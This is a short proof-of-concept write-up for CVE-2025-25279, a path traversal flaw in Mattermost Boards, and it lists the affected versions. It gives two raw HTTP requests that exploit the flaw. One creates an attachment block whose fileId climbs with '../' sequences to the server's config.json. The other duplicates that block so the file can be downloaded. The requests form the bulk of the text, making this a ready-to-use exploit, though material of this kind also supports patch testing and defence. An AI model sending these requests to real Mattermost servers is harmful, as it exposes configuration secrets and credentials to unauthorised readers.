
Proof-of-concept for CVE-2025-25279: path traversal in Mattermost Boards allows arbitrary file read via crafted import archive and board duplication.
After uploading a file to Mattermost Boards, when the fileId parameter is modified and the board is copied, the file now points to and downloads the target file specified in the parameter.
Affected Versions: Mattermost instances with Boards enabled CVE: CVE-2025-25279
Mattermost versions 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 fail to properly validate board blocks when importing boards which allows an attacker could read any arbitrary file on the system via importing and exporting a specially crafted import archive in Boards.

POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
Credit is not mine, includes review